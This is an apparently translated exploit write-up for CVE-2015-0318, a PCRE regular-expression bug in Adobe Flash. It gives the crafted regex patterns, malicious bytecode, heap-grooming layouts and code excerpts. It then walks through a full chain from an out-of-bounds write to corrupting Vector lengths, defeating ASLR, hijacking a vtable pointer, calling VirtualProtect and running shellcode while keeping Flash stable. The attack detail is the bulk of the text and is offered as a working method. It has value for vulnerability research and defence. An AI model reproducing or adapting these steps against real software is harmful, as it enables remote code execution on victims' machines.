Exploiting the PCRE Regular Expression Vulnerability CVE-2015-0318 in Flash
0x00 Preface
Issue 199/PSIRT-3161/CVE-2015-0318
Brief introduction: this post covers a bug in the PCRE regular expression engine used by Flash.
Note: details of the vulnerability are on the issue page listed above.
0x01 Background
/* For \c, a following letter is upper-cased; then the 0x40 bit is flipped.
This coding is ASCII-specific, but then the whole concept of \cx is
ASCII-specific. (However, an EBCDIC equivalent has now been added.) */

case 'c':                            <---- There's no check to see if we're in UTF8 mode
c = *(++ptr);                        <---- This could be part of a multibyte unicode character
if (c == 0)
{
    *errorcodeptr = ERR2;
    break;
}

#ifndef EBCDIC  /* ASCII coding */
if (c >= 'a' && c <= 'z') c -= 32;
c ^= 0x40;
#else           /* EBCDIC coding */
if (c >= 'a' && c <= 'z') c += 64;
c ^= 0xC0;
#endif
break;
So what happens when the escape sequence \c (which expects a single ASCII character to follow it) is followed by a multi-byte UTF-8 character? We can trigger the bug with the simple pattern "\c\xd0\x80+", as shown below:
\c?+(?1)
The following bytecode is generated after compilation:
0000 5d0009      93 BRA      [9]
0003 1bc290      27 CHAR     ['\xc2\x90']
0006 201b        32 PLUS     ['\x1b']
0008 80         128 INVALID
0009 540009      84 KET      [9]
000c 00           0 END
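The operand of the CHAR opcode can be checked by hand. The Python sketch below models only the ASCII branch of the \c handler quoted earlier. The function name control_escape is hypothetical, and the final step (re-encoding the result as UTF-8) is an assumption inferred from the CHAR ['\xc2\x90'] operand in the dump, not code taken from PCRE.

```python
def control_escape(next_byte: int) -> int:
    """Model of the ASCII branch of the \\c handler: upper-case, then flip bit 0x40."""
    c = next_byte
    if ord("a") <= c <= ord("z"):
        c -= 32
    return c ^ 0x40


# Intended use: \cA yields Ctrl-A.
ctrl_a = control_escape(ord("A"))

# Buggy use: the byte after \c is 0xd0, the lead byte of the two-byte
# UTF-8 sequence d0 80. Only the lead byte is consumed by the handler.
lead, continuation = 0xD0, 0x80
c = control_escape(lead)

# Assumption: in UTF-8 mode the resulting value is emitted as a UTF-8 character.
emitted = chr(c).encode("utf-8")

print(hex(ctrl_a), hex(c), emitted, hex(continuation))
```

The handler never consumes the continuation byte 0x80, which is consistent with the stray 0x80 that appears as an invalid opcode in the dump. How exactly that byte reaches the bytecode is not modelled here.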
Clearly something is wrong with this bytecode, but the question is how to turn invalid bytecode into code execution. Unfortunately, if we simply run a match with this invalid bytecode, the match fails and the matcher exits without doing anything else.
However, there is still hope: pcre_compile.cpp gives us some other options. The one I used is find_bracket, which walks the bytecode from the current position to the end and has a rather permissive default case in its switch statement. This function is used to locate a numbered group (and fill in an offset to it), so it may let us cause some odd memory corruption, or steer PCRE away from executing the bytecode it normally would.
So let's take this example and add a back reference:
\c?0?4+(?1)
We then reach the following line with c set to the invalid opcode 0x80:
/* Add in the fixed length from the table */
code += _pcre_OP_lengths[c];
Now, _pcre_OP_lengths is a global array, and index 0x80 lies slightly past its end. This is very convenient, because the array sits directly in front of a set of string tables used for internationalization (on both Windows and Linux). In every Flash version, the value read is 110 (obviously larger than the length of any valid opcode), so if we can groom the heap, we can move the code pointer out of the allocated bytecode buffer and into data that we control. We then only need find_bracket to find its matching group inside the buffer we prepared, and hope that this lets us execute malicious bytecode.
We run into a small problem: when the bytecode is invalid, the match exits early. The solution is to wrap the invalid part in parentheses and make it an optional group:
(\c?0?4+)?(?2)
With a suitably groomed buffer in place for group 2, the regular expression compiles successfully:
LEGITIMATE HEAP BUFFER
0000 5d001b      93 BRA      [27]
0003 66         102 BRAZERO
0004 5e000b0001  94 CBRA     [11, 1]
0009 1bc290      27 CHAR     ['\xc2\x90']
000c 201b        32 PLUS     ['\x1b']
000e 80         128 INVALID
000f 54000b      84 KET      [11]
0012 5c0006      92 ONCE     [6]
0015 510083      81 RECURSE  [131]   <---- this 131 is the bytecode index to recurse to (131 == 0x83, at the start of our groomed heap buffer)
0018 540006      84 KET      [6]
001b 54001b      84 KET      [27]
001e 00           0 END
…
GROOMED HEAP BUFFER
0083 5e00880002  94 CBRA     [136, 2]
0088 540088      84 KET      [136]
When we execute this regular expression, everything goes smoothly, because the path actually executed is:
0000 5d001b      93 BRA      [27]
0003 66         102 BRAZERO
0004 5e000b0001  94 CBRA     [11, 1]
0009 1bc290      27 CHAR     ['\xc2\x90']   <---- Fail, backtrack
0015 510083      81 RECURSE  [131]
0083 5e00880002  94 CBRA     [136, 2]       <---- Now executing inside our groomed heap buffer
0088 540088      84 KET      [136]
0018 540006      84 KET      [6]
001b 54001b      84 KET      [27]
001e 00           0 END
So now we can happily insert any regular expression bytecode between the CBRA and the KET in our groomed heap buffer.
The PCRE bytecode interpreter is surprisingly robust, so it took me a long time to find a useful memory corruption primitive. Most memory accesses in the interpreter are bounds checked. Had the checks been less thorough, an out-of-bounds write would have let us do more. There are still plenty of out-of-bounds read opportunities, but right now we need a write.
Here is an interesting piece of code. When CBRA is processed, the group number is handled incorrectly. The code is as follows (from pcre_exec.cpp; I have tidied it up a little and removed the debug code):
case OP_CBRA:
case OP_SCBRA:
number = GET2(ecode, 1 + LINK_SIZE);    <---- we control number
offset = number << 1;                   <---- we control offset

if (offset < md->offset_max)            <---- bounds check that offset within offset_vector
{
    save_offset3 = md->offset_vector[md->offset_end - number];    <---- we control number, so if number is 0, we index at md->offset_end, which is one past the end of the array
    save_capture_last = md->capture_last;

    if (ES3_Compatible_Behavior)    // clear all matches for groups > than this one
    {                               // (we only really need to reset all enclosed groups, but
                                    // covering all groups > this is harmless because
                                    // we interpret from left to right)
        savedElems = (offset_top > offset ? offset_top - offset : 2);
        if (savedElems > frame->XoffsetStackSaveMax)
        {
            if (frame->XoffsetStackSave != frame->XoffsetStackSaveStg)
            {
                (pcre_free)(frame->XoffsetStackSave);
            }
            frame->XoffsetStackSave = (int *)(pcre_malloc)(savedElems * sizeof(int));
            if (frame->XoffsetStackSave == NULL)
            {
                RRETURN(PCRE_ERROR_NOMEMORY);
            }
            frame->XoffsetStackSaveMax = savedElems;
        }
        VMPI_memcpy(offsetStackSave, md->offset_vector + offset, (savedElems * sizeof(int)));
        for (int resetOffset = offset + 2; resetOffset < offset_top; resetOffset++)
        {
            md->offset_vector[resetOffset] = -1;
        }
    }
    else
    {
        offsetStackSave[1] = md->offset_vector[offset];
        offsetStackSave[2] = md->offset_vector[offset + 1];
        savedElems = 0;
    }

    md->offset_vector[md->offset_end - number] = eptr - md->start_subject;    <---- even better, we write the current length of the match there; this is becoming interesting.
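To see why group number 0 slips through, here is a minimal Python model of just the bounds check and the index computation from the excerpt above. The function name cbra_write_index is hypothetical, and the vector size of 126 ints is an illustrative assumption; offset_max is derived from it with the (2 * ocount) / 3 formula used by PCRE.

```python
def cbra_write_index(number: int, offset_end: int, offset_max: int):
    """Return the offset_vector index OP_CBRA writes to, or None if the check fails."""
    offset = number << 1
    if offset < offset_max:          # the only bounds check in the excerpt
        return offset_end - number   # index used for the read and the later write
    return None


OCOUNT = 126                     # illustrative offset_vector size, in ints
OFFSET_END = OCOUNT
OFFSET_MAX = (2 * OCOUNT) // 3   # same formula as md->offset_max

valid_indices = range(OCOUNT)    # legal indices are 0 .. OCOUNT - 1

for number in (1, 2, 0):
    index = cbra_write_index(number, OFFSET_END, OFFSET_MAX)
    print(number, index, index in valid_indices)
```

For numbers 1 and 2 the index stays inside the vector. For number 0 the check passes (0 < offset_max) but the index equals offset_end, one element past the end.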
Therefore, we can write a DWORD that we control just past the end of offset_vector. In this case, offset_vector is normally a stack buffer allocated in RegExpObject.cpp:
ArrayObject* RegExpObject::_exec(Stringp subject,
                                 StIndexableUTF8String& utf8Subject,
                                 int startIndex,
                                 int& matchIndex,
                                 int& matchLen)
{
    AvmAssert(subject != NULL);

    int ovector[OVECTOR_SIZE];    <--
    int results;
    int subjectLength = utf8Subject.length();
This is not very interesting: writing a single dword there is of little use. I did not check, but modern compilers reorder variables and add stack cookies, so this is almost useless. However, there is an easier way. If the pattern uses more capture groups than the supplied buffer can hold, PCRE allocates a suitably sized buffer on the heap instead. (The space originally reserved on the stack is not large enough, so the matcher allocates a separate block of heap memory to work in.)
/* If the expression has got more back references than the offsets supplied can
hold, we get a temporary chunk of working store to use during the matching.
Otherwise, we can use the vector supplied, rounding down its size to a multiple
of 3. */

ocount = offsetcount - (offsetcount % 3);

if (re->top_backref > 0 && re->top_backref >= ocount / 3)
{
    ocount = re->top_backref * 3 + 3;
    md->offset_vector = (int *)(pcre_malloc)(ocount * sizeof(int));
    if (md->offset_vector == NULL)
    {
        return PCRE_ERROR_NOMEMORY;
    }
    using_temporary_offsets = TRUE;
    DPRINTF(("Got memory to hold back references\n"));
}
else
{
    md->offset_vector = offsets;
}

md->offset_end = ocount;
md->offset_max = (2 * ocount) / 3;
md->offset_overflow = FALSE;
md->capture_last = -1;
Great. For any allocation larger than 99*4 = 396 bytes, we can write one DWORD just past the end of a heap allocation. Since the write has to land immediately after the allocated block, let's look at the Flash heap allocator. It turns out that 504 bytes is the first size that we match exactly, so we need re->top_backref = 41 to get this size. This is easy: we just add a bunch of capture groups and a back reference.
(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41(\c?0?4+)?(?43)
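The 504-byte figure follows directly from the allocation code quoted above. The sketch below redoes that arithmetic in Python. The function name offset_vector_bytes is hypothetical, and OVECTOR_SIZE = 99 and a 4-byte int are assumptions taken from the "99*4 = 396" figure in the text.

```python
SIZEOF_INT = 4       # assumption: 32-bit int
OVECTOR_SIZE = 99    # assumption: implied by the 99*4 = 396 figure in the text


def offset_vector_bytes(top_backref: int, offsetcount: int = OVECTOR_SIZE):
    """Size in bytes of the temporary heap vector, or None if the supplied vector is used."""
    ocount = offsetcount - (offsetcount % 3)
    if top_backref > 0 and top_backref >= ocount // 3:
        ocount = top_backref * 3 + 3
        return ocount * SIZEOF_INT
    return None


# Smallest back reference number that forces a heap allocation.
first_heap = next(n for n in range(1, 100) if offset_vector_bytes(n) is not None)

print(first_heap, offset_vector_bytes(first_heap))
print(41, offset_vector_bytes(41))
```

With a highest back reference of 41, ocount becomes 41 * 3 + 3 = 126 ints, which is 504 bytes, matching the size chosen for the heap allocator.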
Another problem is that Flash does not check whether the regular expression compiled successfully. If our heap grooming fails, find_bracket will not find a matching group, so compilation fails. This makes debugging awkward, so we add a constant alternative at the start of the pattern that we can use to test whether compilation succeeded.
(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41(\c?0?4+)?(?70))
As mentioned earlier, we need a heap layout in which data we control sits directly after the buffer holding the bytecode compiled from our regular expression. For simplicity, we pad the regular expression so that its compiled buffer is also a convenient size for the Flash heap allocator. The next available size is 576 bytes, and each added character adds 2 bytes.
(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\c?0?4*)?(?70))
One more change is needed: the value written is the current length of the match, so we need an easy way to control it. We can change the first group to match any number of some other character, as shown below:
(c01db33f|(B*)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\c?0?4*)?(?70))
Note: in the exploit code we replace B with a randomly chosen character, because Flash caches the compiled regular expression whether or not compilation succeeded. If our heap grooming fails, we need to force Flash to recompile the regular expression.
This completes the initial compilation and setup. We already know the bytecode payload that performs the out-of-bounds write:
0000 5e00010046  94 CBRA     [1, 70]
0005 5e00000000  94 CBRA     [0, 0]
000a 6d         109 ACCEPT
The final ACCEPT is required for the write to happen: group 0 has to match, and ACCEPT forces that with the smallest amount of bytecode.
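The byte layout of this payload can be read straight off the dump: a one-byte opcode, then for CBRA a two-byte link and a two-byte group number, both big-endian. The small Python decoder below is a sketch for reading such dumps, not part of PCRE. It knows only the two opcodes that appear in this payload, with values taken from the listing above, and the function name decode is hypothetical.

```python
import struct

# Only the opcodes present in this payload; values taken from the dump.
OPCODES = {0x5E: "CBRA", 0x6D: "ACCEPT"}


def decode(payload: bytes):
    """Decode a byte string made up of CBRA and ACCEPT operations."""
    ops, pos = [], 0
    while pos < len(payload):
        name = OPCODES[payload[pos]]
        if name == "CBRA":
            # Two big-endian 16-bit fields: link size, then group number.
            link, number = struct.unpack_from(">HH", payload, pos + 1)
            ops.append((pos, name, link, number))
            pos += 5
        else:
            ops.append((pos, name))
            pos += 1
    return ops


payload = bytes.fromhex("5e00010046" "5e00000000" "6d")
for op in decode(payload):
    print(op)
```

The second CBRA carries group number 0, which is the value that passes the bounds check while indexing one element past the end of offset_vector.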
If you have followed along this far, you may think this is all rather a lot of trouble. In practice, this is about as good a starting point as an exploit gets: we control the allocation size, and we write the length of our match just past the end of the allocation, although overwriting a pointer with such a value would be awkward. The good news is that Flash offers a convenient target: Vector. We can allocate such an object with any size we like, and its first DWORD is a length field. Once we overwrite this length field, nothing stands between us and arbitrary read/write, and the resulting exploit is also very stable.
0x01 Compiling the regular expression
First, we need to allocate a large number of buffers of size 576 (the same size as our compiled regular expression) and fill them with our malicious bytecode:
________________________________________________________________________________________
|exploit-bytecode------------|exploit-bytecode------------|exploit-bytecode------------|
````````````````````````````````````````````````````````````````````````````````````````
Then we free the second buffer, which leaves a conveniently sized gap that the Flash heap allocator will readily reuse (that is, the next allocation of this size is very likely to be placed in the gap).
________________________________________________________________________________________
|exploit-bytecode------------|FREE                        |exploit-bytecode------------|
````````````````````````````````````````````````````````````````````````````````````````
So when we compile our regular expression, its buffer lands in this gap almost every time, and the compiled bytecode is then followed directly by a buffer filled with our malicious bytecode.
________________________________________________________________________________________
|exploit-bytecode------------|ERCP|metadata|regex-bytecode|exploit-bytecode------------|
````````````````````````````````````````````````````````````````````````````````````````
0x02 Running the regular expression to corrupt the vector length
A few tricks are needed here as well. We want a Vector with a length of 0xffffffff, so that we can read and write all of memory (Note: it really is not 0x7fffff). We start by creating a series of vectors. Their allocation size must be 504, the same as the size of offset_vector.
________________________________________________________________________________________
|length|vector---------------|length|vector---------------|length|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
Then we free one of them, for example:
________________________________________________________________________________________
|FREE                        |length|vector---------------|length|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
When the regular expression is executed, the length of the current match (a dword) is written just past the end of the allocated offset_vector, which corrupts the length field of the first vector.
________________________________________________________________________________________
|offset_vector---------------|corrupt|vector--------------|length|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
We only need to increase the length of the first vector by one element. We can then use the first vector to take full control of the length field of the second:
________________________________________________________________________________________
|offset_vector---------------|length+1|vector--------------------|vector---------------|
````````````````````````````````````````````````````````````````````````````````````````
________________________________________________________________________________________
|offset_vector---------------|length+1|vector---------------|UINT_MAX|vector-----------------------
````````````````````````````````````````````````````````````````````````````````````````
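The two diagrams can be reproduced with a toy model. The Python sketch below lays out two length-prefixed vectors back to back in a bytearray and shows that raising the first length by one makes its last element overlap the second vector's length field. Everything here is a simplification for illustration: the four-element capacity, the little-endian layout, the absence of allocator metadata between blocks, and the helper names are all assumptions, not Flash internals.

```python
import struct

CAPACITY = 4                 # elements per toy vector (tiny, for illustration)
BLOCK = 4 + 4 * CAPACITY     # 4-byte length field followed by the elements

heap = bytearray(2 * BLOCK)  # two adjacent vectors, no metadata in between
FIRST, SECOND = 0, BLOCK


def get_length(base: int) -> int:
    return struct.unpack_from("<I", heap, base)[0]


def set_length(base: int, length: int) -> None:
    struct.pack_into("<I", heap, base, length)


def write_elem(base: int, index: int, value: int) -> None:
    """Bounds-checked element write, trusting the stored length field."""
    if not 0 <= index < get_length(base):
        raise IndexError(index)
    struct.pack_into("<I", heap, base + 4 + 4 * index, value)


set_length(FIRST, CAPACITY)
set_length(SECOND, CAPACITY)

# Model of the corruption: the first length field grows by one.
set_length(FIRST, CAPACITY + 1)

# Index CAPACITY now passes the bounds check and lands on SECOND's length field.
write_elem(FIRST, CAPACITY, 0xFFFFFFFF)

print(hex(get_length(SECOND)))
```

The bounds check is only as trustworthy as the stored length, which is why a single off-by-one in that field is enough to reach the neighbouring vector.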
Now we can read and write anywhere in the Flash process's address space, and we can almost declare Flash finished. One major problem remains: we do not know where our huge Vector is, and all of our memory accesses are relative to the address of its buffer.
0x03 Where is the corrupted Vector?
Conveniently, the PCRE code frees the offset_vector buffer before returning to the ActionScript code. This means that we can read backwards from our vector and find a freelist pointer in the free block in front of it.
| FREE | ptr | length | vector --- |-| UINT_MAX | vector --- |
``````````````````````````````````````````````````````````````
This pointer points to the next free block, which is almost certainly the one directly after our huge vector. We could verify this, but because the blocks are this large it is a safe bet. This turns our relative read/write into a full, absolute read/write.
| FREE | ptr | length | vector --- |-| UINT_MAX | vector --- | FREE | ptr |
``````````|`````````````````````````````````````````````````````^``````````
          |_____________________________________________________|
0x04 Others
The rest is a routine walkthrough of turning read/write access into code execution on Windows. If that bores you, you can skip this section.
1. Find a module
We have bypassed ASLR as far as locating the Vector goes, but we still do not know where anything else is. We need a loaded module whose code we can use. One option is heap spraying, but that is not necessary here.
The memory pages allocated by FixedAlloc in Flash start with a convenient structure, which contains a pointer that eventually leads to a static instance of a C++ class. That instance lives inside the Flash module, so we can use it to locate the Flash module. For details, see the exploit code.
Once we have a pointer into the module, we can search from that pointer for MZ signatures. This lets us identify each module and then parse its export table, which we use in the final stage of the exploit.
2. Overwrite
Now we have bypassed ASLR. If this were a Linux exploit and there were no RELRO, we would simply overwrite a function pointer in the GOT section, but Windows has no such convenient technique. By reverse engineering the Flash binary, we eventually found something we can overwrite that is easier than manipulating the heap.
If we create another ActionScript class and instantiate it, the object is allocated on the heap and holds a vtable pointer that links it to its functions. We can give the class some fixed, distinctive contents so that it is easy to find. By walking the heap structures we can then locate the object without risking an access to unmapped memory.
3. Execute the code
One useful feature of the Flash JIT is that arguments of simple native types are pushed onto the native stack (just as in a normal native function call). This means that if the function whose pointer we overwrite takes a large number of uint parameters, we control a large region of the native stack. When the function is called, we can pivot directly onto a valid program stack.
All we need to do is call VirtualProtect to mark the pages of the Vector as executable, place our shellcode there, and jump to it.
When calling VirtualProtect, we can reserve a large enough stack region by declaring unused variables. That way Flash's original stack frame is not damaged when we return (our fake stack frame sits in the middle of the original one).
4. Resume execution
After our code has run, how do we return to Flash without crashing it? Let's review what we did to the process. If everything went well, we corrupted only three dwords of memory, so resuming execution is easy:
(1) The length of the first vector was increased by 1. (2) The length of the second vector was set to UINT_MAX. (3) A function pointer was changed to point at our function.
We can repair (1) right after overwriting the length of the second vector. (2) has to be repaired, because otherwise Flash may try to release all of memory when it frees the vector. (3) does not need to be restored, because it is never used again.
This means that if we handle the exploit correctly, Flash sees almost no difference before and after it runs. Our payload behaves like a hook on a Flash function: after executing our code, it returns to the original Flash function.